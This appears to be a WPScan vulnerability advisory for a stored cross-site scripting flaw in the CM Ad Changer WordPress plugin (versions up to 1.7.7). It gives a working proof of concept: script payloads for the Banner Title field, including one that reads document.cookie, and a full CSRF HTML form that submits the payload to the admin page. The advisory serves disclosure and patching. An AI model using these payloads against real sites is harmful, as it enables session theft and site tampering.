CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link (CSRF) which can trigger the Stored XSS.
Proof of Concept
1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the next tab "Campaign Banners", select an Image in Campaign images and in Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

<html>
 
  <body>
    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will Trigger Stored XSS at banner_title Parameter.

Affects

Plugin cm-ad-changer
fixed in version 1.7.8

References

URL https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Aaditya Purani
Submitter Website https://aadityapurani.com
Submitter Twitter aaditya_purani
Views 99
Verified No
WPVDB ID 8514

Timeline

Publicly Published 2016-06-09 (6 months ago)
Added 2016-06-13 (6 months ago)
Last Updated 2016-06-13 (6 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.